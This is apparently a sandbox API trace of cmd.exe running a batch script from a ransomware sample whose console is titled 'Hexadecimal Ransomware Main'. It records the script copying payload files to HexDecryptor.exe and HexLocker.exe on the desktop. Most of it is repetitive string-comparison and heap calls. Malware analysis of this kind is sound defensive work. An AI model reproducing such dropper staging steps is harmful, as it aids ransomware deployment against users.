_wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.678] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0109.679] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0109.679] GetProcessHeap () returned 0x1dc256b0000 [0109.679] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3200) returned 1 [0109.679] GetProcessHeap () returned 0x1dc256b0000 [0109.679] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256c6450 [0109.679] GetProcessHeap () returned 0x1dc256b0000 [0109.679] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c6450, Size=0x7c) returned 0x1dc256c13f0 [0109.679] GetProcessHeap () returned 0x1dc256b0000 [0109.679] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c13f0) returned 0x7c [0109.679] GetProcessHeap () returned 0x1dc256b0000 [0109.679] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bf020 [0109.680] GetProcessHeap () returned 0x1dc256b0000 [0109.680] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256bc4a0 [0109.680] _wcsicmp (_String1="HexDCIF.hex", _String2=".") returned 58 [0109.680] _wcsicmp (_String1="HexDCIF.hex", _String2="..") returned 58 [0109.680] GetFileAttributesW (lpFileName="HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex")) returned 0x20 [0109.680] GetProcessHeap () returned 0x1dc256b0000 [0109.680] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bed80 [0109.680] GetProcessHeap () returned 0x1dc256b0000 [0109.680] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be260 [0109.680] _wcsicmp (_String1="HexDecryptor.exe", _String2=".") returned 58 [0109.680] _wcsicmp (_String1="HexDecryptor.exe", _String2="..") returned 58 [0109.680] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x407419e9fc, ReturnLength=0x0) returned 0x0 [0109.680] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9f8, ProcessInformationLength=0x4) returned 0x0 [0109.680] malloc (_Size=0xffce) returned 0x1dc25800120 [0109.682] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0109.683] malloc (_Size=0xffce) returned 0x1dc25810100 [0109.683] ??_V@YAXPEAX@Z () returned 0x1dc25810100 [0109.684] malloc (_Size=0xffce) returned 0x1dc258200e0 [0109.684] ??_V@YAXPEAX@Z () returned 0x1dc258200e0 [0109.684] malloc (_Size=0x1ff9c) returned 0x1dc258300c0 [0109.684] ??_V@YAXPEAX@Z () returned 0x1dc258300c0 [0109.686] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1dc25610000 [0109.686] FindFirstFileExW (in: lpFileName="HexDCIF.hex", fInfoLevelId=0x1, lpFindFileData=0x1dc256bc4b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dc256bc4b0) returned 0x1dc256beba0 [0109.686] malloc (_Size=0xffce) returned 0x1dc25850070 [0109.687] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0109.687] malloc (_Size=0xffce) returned 0x1dc25860050 [0109.687] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0109.688] ??_V@YAXPEAX@Z () returned 0x1 [0109.688] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", lpFilePart=0x0) returned 0x28 [0109.689] ??_V@YAXPEAX@Z () returned 0x1 [0109.690] _wcsicmp (_String1="HexDCIF.hex", _String2="con") returned 5 [0109.690] CreateFileW (lpFileName="HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419e000, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x9c [0109.690] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0109.690] _get_osfhandle (_FileHandle=3) returned 0x9c [0109.690] GetFileType (hFile=0x9c) returned 0x1 [0109.690] SetErrorMode (uMode=0x0) returned 0x0 [0109.690] SetErrorMode (uMode=0x1) returned 0x0 [0109.691] GetFullPathNameW (in: lpFileName="HexDCIF.hex", nBufferLength=0xffce, lpBuffer=0x1dc258300c0, lpFilePart=0x407419e050 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", lpFilePart=0x407419e050*="HexDCIF.hex") returned 0x23 [0109.691] SetErrorMode (uMode=0x0) returned 0x1 [0109.691] _get_osfhandle (_FileHandle=3) returned 0x9c [0109.691] ReadFile (in: hFile=0x9c, lpBuffer=0x1dc25610000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x407419e084, lpOverlapped=0x0 | out: lpBuffer=0x1dc25610000*, lpNumberOfBytesRead=0x407419e084*=0x200, lpOverlapped=0x0) returned 1 [0109.692] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0109.693] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0109.694] SetErrorMode (uMode=0x0) returned 0x0 [0109.694] SetErrorMode (uMode=0x1) returned 0x0 [0109.694] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", lpFilePart=0x407419dde0*="HexDecryptor.exe") returned 0x28 [0109.694] SetErrorMode (uMode=0x0) returned 0x1 [0109.694] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", _String2="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe") returned -2 [0109.694] ??_V@YAXPEAX@Z () returned 0x1 [0109.695] GetProcessHeap () returned 0x1dc256b0000 [0109.695] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be4d0 [0109.695] _wcsicmp (_String1="HexDecryptor.exe", _String2=".") returned 58 [0109.695] _wcsicmp (_String1="HexDecryptor.exe", _String2="..") returned 58 [0109.695] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0xffffffff [0109.695] GetLastError () returned 0x2 [0109.695] malloc (_Size=0xffce) returned 0x1dc25850070 [0109.696] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0109.697] malloc (_Size=0xffce) returned 0x1dc25860050 [0109.697] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0109.698] ??_V@YAXPEAX@Z () returned 0x1 [0109.698] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", lpFilePart=0x0) returned 0x28 [0109.698] ??_V@YAXPEAX@Z () returned 0x1 [0109.699] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0109.700] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0109.701] SetErrorMode (uMode=0x0) returned 0x0 [0109.701] SetErrorMode (uMode=0x1) returned 0x0 [0109.701] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", lpFilePart=0x407419dde0*="HexDecryptor.exe") returned 0x28 [0109.701] SetErrorMode (uMode=0x0) returned 0x1 [0109.701] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", _String2="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe") returned -2 [0109.701] ??_V@YAXPEAX@Z () returned 0x1 [0109.702] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0xffffffff [0109.702] CopyFileExW (lpExistingFileName="HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex"), lpNewFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x7ff67b909834, dwCopyFlags=0x0) returned 1 [0109.845] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0x20 [0109.845] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexDecryptor.exe", dwFileAttributes=0x20) returned 1 [0109.846] _close (_FileHandle=3) returned 0 [0109.846] FindNextFileW (in: hFindFile=0x1dc256beba0, lpFindFileData=0x1dc256bc4b0 | out: lpFindFileData=0x1dc256bc4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4adbe4a, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4adbe4a, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexDCIF.hex", cAlternateFileName="")) returned 0 [0109.848] GetLastError () returned 0x12 [0109.848] FindClose (in: hFindFile=0x1dc256beba0 | out: hFindFile=0x1dc256beba0) returned 1 [0109.848] ??_V@YAXPEAX@Z () returned 0x1 [0109.849] ??_V@YAXPEAX@Z () returned 0x1 [0109.851] ??_V@YAXPEAX@Z () returned 0x1 [0109.853] ??_V@YAXPEAX@Z () returned 0x1 [0109.856] _vsnwprintf (in: _Buffer=0x7ff67b920310, _BufferCount=0x103, _Format="%9d", _ArgList=0x407419e9d8 | out: _Buffer=" 1") returned 9 [0109.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.856] GetFileType (hFile=0x50) returned 0x2 [0109.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0109.856] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x407419e8c8 | out: lpMode=0x407419e8c8) returned 1 [0109.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x50, lpConsoleScreenBufferInfo=0x407419e900 | out: lpConsoleScreenBufferInfo=0x407419e900) returned 1 [0110.039] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0110.040] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x407419e9a0 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0110.040] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x407419e8f0, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x407419e8f0*=0x1b) returned 1 [0110.143] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4) returned 0x0 [0110.143] ??_V@YAXPEAX@Z () returned 0x1 [0110.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.147] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0110.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.264] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0110.356] _get_osfhandle (_FileHandle=0) returned 0x4c [0110.356] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0110.433] SetConsoleInputExeNameW () returned 0x1 [0110.433] GetConsoleOutputCP () returned 0x1b5 [0110.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0110.568] SetThreadUILanguage (LangId=0x0) returned 0x409 [0110.663] ??_V@YAXPEAX@Z () returned 0x1 [0110.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0110.667] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0110.667] _get_osfhandle (_FileHandle=3) returned 0xa0 [0110.667] SetFilePointer (in: hFile=0xa0, lDistanceToMove=307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x133 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be4d0) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bed80) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf020) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c13f0) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bed20) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bec00) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c1750) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0a60) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0ee0) returned 1 [0110.667] GetProcessHeap () returned 0x1dc256b0000 [0110.667] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3110) returned 1 [0110.668] GetProcessHeap () returned 0x1dc256b0000 [0110.668] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0110.668] VirtualFree (lpAddress=0x1dc25610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.668] _get_osfhandle (_FileHandle=3) returned 0xa0 [0110.668] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x133 [0110.668] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0xb6, lpOverlapped=0x0) returned 1 [0110.669] SetFilePointer (in: hFile=0xa0, lDistanceToMove=365, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16d [0110.669] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=58, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="copy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 58 [0110.669] _get_osfhandle (_FileHandle=3) returned 0xa0 [0110.670] GetFileType (hFile=0xa0) returned 0x1 [0110.670] _get_osfhandle (_FileHandle=3) returned 0xa0 [0110.670] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16d [0110.670] GetProcessHeap () returned 0x1dc256b0000 [0110.670] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256d86c0 [0110.670] GetProcessHeap () returned 0x1dc256b0000 [0110.670] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256dc6e0 [0110.670] GetProcessHeap () returned 0x1dc256b0000 [0110.670] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x22) returned 0x1dc256c33b0 [0110.670] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="FD1HVy") returned 0x6 [0110.671] GetProcessHeap () returned 0x1dc256b0000 [0110.671] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c33b0) returned 1 [0110.671] GetProcessHeap () returned 0x1dc256b0000 [0110.671] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256dc6e0) returned 1 [0110.672] GetProcessHeap () returned 0x1dc256b0000 [0110.672] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0110.676] _wcsicmp (_String1="copy", _String2=")") returned 58 [0110.676] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0110.676] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0110.676] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0110.676] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0110.676] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0110.676] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0110.676] GetProcessHeap () returned 0x1dc256b0000 [0110.676] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0110.676] GetProcessHeap () returned 0x1dc256b0000 [0110.676] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256c3230 [0110.677] GetProcessHeap () returned 0x1dc256b0000 [0110.677] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x72) returned 0x1dc256bcea0 [0110.677] _tell (_FileHandle=3) returned 365 [0110.677] _close (_FileHandle=3) returned 0 [0110.678] malloc (_Size=0xffce) returned 0x1dc257e0160 [0110.680] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0110.680] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0110.680] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0110.680] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0110.681] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0110.681] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0110.681] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0110.757] malloc (_Size=0xffce) returned 0x1dc257f0140 [0110.757] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0110.758] malloc (_Size=0xffce) returned 0x1dc25800120 [0110.758] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0110.759] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0110.759] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0110.759] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0110.759] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0110.759] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0110.759] ??_V@YAXPEAX@Z () returned 0x1 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xd4) returned 0x1dc256bcf20 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcf20, Size=0x72) returned 0x1dc256bcf20 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcf20) returned 0x72 [0110.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x7c) returned 0x1dc256c0dc0 [0110.761] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bea20 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bef00 [0110.761] GetProcessHeap () returned 0x1dc256b0000 [0110.761] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256c3440 [0110.761] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0110.762] _wcsnicmp 